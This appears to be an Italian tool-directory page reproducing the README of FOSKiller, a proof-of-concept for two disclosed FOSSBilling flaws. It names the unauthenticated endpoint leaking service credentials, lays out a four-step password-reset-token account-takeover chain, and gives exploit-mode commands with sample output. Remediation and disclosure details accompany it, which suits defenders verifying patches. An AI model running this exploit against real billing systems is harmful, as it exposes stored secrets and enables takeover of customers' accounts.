Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FOSKiller — FOSSBilling CVE-2026-53647 & CVE-2026-53646 PoC — Divulgazione non autenticata della chiave API e riutilizzo del token di reset della password | Kitploit
Strumenti/GitHubGitHub/7megaumka7/foskiller
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APIPenetration Testing
GitHub7megaumka7/foskiller

FOSKiller

FOSSBilling CVE-2026-53647 & CVE-2026-53646 PoC — Divulgazione non autenticata della chiave API e riutilizzo del token di reset della password

Vedi Repository
12 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
root@kitploit:~
 ███████╗ ██████╗ ███████╗██╗  ██╗██╗██╗     ██╗     ███████╗██████╗
 ██╔════╝██╔═══██╗██╔════╝██║ ██╔╝██║██║     ██║     ██╔════╝██╔══██╗
 █████╗  ██║   ██║███████╗█████╔╝ ██║██║     ██║     █████╗  ██████╔╝
 ██╔══╝  ██║   ██║╚════██║██╔═██╗ ██║██║     ██║     ██╔══╝  ██╔══██╗
 ██║     ╚██████╔╝███████║██║  ██╗██║███████╗███████╗███████╗██║  ██║
 ╚═╝      ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝

realizzato da 7megaumka7

Strumento PoC per due vulnerabilità accettate nel programma GitHub Security Advisory in FOSSBilling ≤ 0.7.2

Python License CVE-2026-53647 CVE-2026-53646


Indice

  • Introduzione
  • Vulnerabilità
    • CVE-2026-53647 — Divulgazione della configurazione della chiave API senza autenticazione
    • CVE-2026-53646 — Riutilizzo del token di reset password
  • Requisiti
  • Installazione
  • Utilizzo
    • Opzioni
    • Modalità
    • Esempi
  • Esempio di output
  • Rimedio
  • Divulgazione responsabile
  • Disclaimer legale
  • Crediti

Introduzione

FOSKiller è uno strumento proof-of-concept che dimostra due vulnerabilità di sicurezza in FOSSBilling — una piattaforma open-source per la fatturazione e la gestione dei clienti. Entrambe le vulnerabilità sono state divulgate in modo responsabile attraverso il programma GitHub Security Advisory e sono completamente corrette in FOSSBilling 0.7.3+.

Lo strumento è pensato per:

  • Ricercatori di sicurezza che verificano le proprie installazioni di FOSSBilling
  • Penetration tester che conducono test autorizzati
  • Difensori che confermano l'applicazione della patch

Vulnerabilità

CVE-2026-53647 — Divulgazione della configurazione della chiave API senza autenticazione

L'endpoint guest /api/guest/serviceapikey/get_info restituisce l'intera configurazione del servizio — inclusi i campi custom_*, credenziali API, hostname e password — senza richiedere alcuna autenticazione. Un attaccante che conosce o enumera una chiave API valida può recuperare la configurazione completa del servizio backend da un endpoint pubblico.

Impatto: Esposizione di credenziali del servizio, hostname interni, segreti API.

CVE-2026-53646 — Riutilizzo del token di reset password

Quando un cliente attiva due reset password consecutivi per lo stesso account, l'applicazione emette un nuovo token ma non invalida il precedente. Un attaccante che in precedenza ha catturato il primo token può usarlo per impostare una nuova password anche dopo che l'utente legittimo ha completato il proprio flusso di reset.

Catena dell'attacco:

root@kitploit:~
1. L'attaccante attiva POST /api/guest/client/reset_password → cattura il token T1
2. La vittima attiva il proprio reset → l'app emette T2, T1 rimane valido
3. L'attaccante chiama POST /api/guest/client/update_password?hash=T1 con la password scelta
4. L'attaccante ha accesso persistente indipendentemente dal completamento del reset della vittima

Impatto: Appropriazione persistente dell'account di qualsiasi cliente la cui email di reset sia intercettabile.


Requisiti

  • Python 3.8+
  • requests
  • colorama

Se le dipendenze mancano, lo script lo rileva all'avvio e offre di installarle automaticamente.


Installazione

Clona e installa le dipendenze:

root@kitploit:~
git clone https://github.com/7megaumka7/FOSKiller.git
cd FOSKiller
pip install -r requirements.txt

Oppure esegui senza pre-installazione — lo script chiederà di installare i pacchetti mancanti al primo avvio.


Utilizzo

root@kitploit:~
python fossbilling_poc.py --target URL [--key KEY] [--email EMAIL]
                          [--check-only | --exploit]
                          [--force] [--output FILE]
                          [--timeout SEC] [--proxy URL]

Opzioni

--check-only e --exploit si escludono a vicenda.

Modalità

Esempi

Solo rilevamento — verifica entrambi i CVE senza estrarre dati:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --check-only

Estrazione completa e documentazione della catena d'attacco:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --exploit

Salva risultati in JSON e instrada attraverso Burp Suite:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --output results.json \
  --proxy http://127.0.0.1:8080

Testa una versione sconosciuta o già corretta:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --force

Esempio di output

root@kitploit:~
[*] Sondaggio di https://billing.example.com …
[+] Versione rilevata: 0.7.1
[+] Intervallo interessato per CVE-2026-53647 (>=0.5.3 <=0.7.2): YES
[+] Intervallo interessato per CVE-2026-53646 (>=0.5.6 <=0.7.2): YES

── CVE-2026-53647 │ Divulgazione della configurazione della chiave API senza autenticazione ─────────
[*] Target  : https://billing.example.com/api/guest/serviceapikey/get_info?key=***
[*] Modalità: Estrazione completa
[*] HTTP    : 200
[+] VULNERABILE — l'endpoint ha restituito 4 campi sensibili senza autenticazione

  Campo                          Valore
  ──────────────────────────────────────────────────────────────────────
  custom_hostname                db.internal.example.com
  custom_username                fossbilling_db
  custom_password                [OSCURATO IN QUESTO ESEMPIO]
  custom_api_secret              [OSCURATO IN QUESTO ESEMPIO]

── CVE-2026-53646 │ Riutilizzo del token di reset password / Appropriazione dell'account ─────
[*] Invio richiesta di reset #1 …
[*]   HTTP 200  |  142 ms  |  2026-06-12T10:00:00.000Z
[*] Invio richiesta di reset #2 (stessa email) …
[*]   HTTP 200  |  138 ms  |  2026-06-12T10:00:01.000Z
[*]   Delta temporale tra le richieste: 0.643s
[!] Entrambe le richieste di reset sono riuscite — l'endpoint accetta reset ripetuti senza limitazione di velocità.

── Riepilogo ─────────────────────────────────────────────────────────────

  CVE                  GHSA                         Gravità                  Stato
  ──────────────────────────────────────────────────────────────────────────────────
  CVE-2026-53647       GHSA-737q-9gpr-6mpq          Moderata (CVSS 6.9)    VULNERABILE
  CVE-2026-53646       GHSA-vp66-w6rc-x32p          Alta (CVSS 7.7)        POTENZIALMENTE VULNERABILE

Rimedio

Aggiorna a FOSSBilling >= 0.7.3, che risolve entrambe le vulnerabilità.

Se la correzione immediata non è possibile:

CVEMitigazione provvisoria
CVE-2026-53647Blocca l'accesso a /api/guest/serviceapikey/ a livello di server web o WAF
CVE-2026-53646Implementa l'invalidazione del token su riemissione; aggiungi limitazione di velocità all'endpoint di reset

Divulgazione responsabile

Entrambe le vulnerabilità sono state segnalate ai manutentori di FOSSBilling attraverso il programma GitHub Security Advisory prima di questa pubblicazione.

  • Advisory 1: https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-737q-9gpr-6mpq
  • Advisory 2: https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-vp66-w6rc-x32p

Disclaimer legale

Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati.

Usa questo strumento solo contro sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione scritta per testare. L'uso non autorizzato contro sistemi di terze parti è illegale ai sensi del Computer Fraud and Abuse Act (CFAA), del Computer Misuse Act e della legislazione equivalente in tutto il mondo.

L'autore non si assume alcuna responsabilità per uso improprio, danni o conseguenze legali derivanti dall'uso di questo strumento. Usando questo strumento accetti di essere l'unico responsabile delle tue azioni.


Crediti

Ricercatore e autore: 7megaumka7

Scoperta delle vulnerabilità, analisi, divulgazione responsabile e sviluppo dello strumento.

Scarica lo strumento
AvvisoCVETipoCVSSVersioni interessate
GHSA-737q-9gpr-6mpqCVE-2026-53647Divulgazione della configurazione della chiave API senza autenticazione6.9 Moderata>= 0.5.3, <= 0.7.2
GHSA-vp66-w6rc-x32pCVE-2026-53646Riutilizzo del token di reset password → Appropriazione dell'account7.7 Alta>= 0.5.6, <= 0.7.2
OpzioneObbligatorioDescrizione
--target URLSìURL base dell'istanza FOSSBilling
--key KEYPer CVE-2026-53647Chiave API da testare
--email EMAILPer CVE-2026-53646Email del cliente da testare
--check-onlyNoModalità di rilevamento — conferma la vulnerabilità senza estrarre dati
--exploitNoEstrazione completa + documentazione della catena d'attacco
--forceNoSalta il controllo dell'intervallo di versione
--output FILENoSalva i risultati completi in un file JSON
--timeout SECNoTimeout HTTP in secondi (default: 10)
--proxy URLNoProxy HTTP (es. http://127.0.0.1:8080)
ModalitàOpzioneCosa fa
Rilevamento--check-onlyConferma l'esistenza della vulnerabilità. Non mostra né estrae valori sensibili.
Predefinita(nessuna opzione di modalità)Conferma lo stato e mostra evidenze di base.
Sfruttamento--exploitEstrae tutti i campi divulgati; documenta la catena completa di appropriazione dell'account con metadati temporali.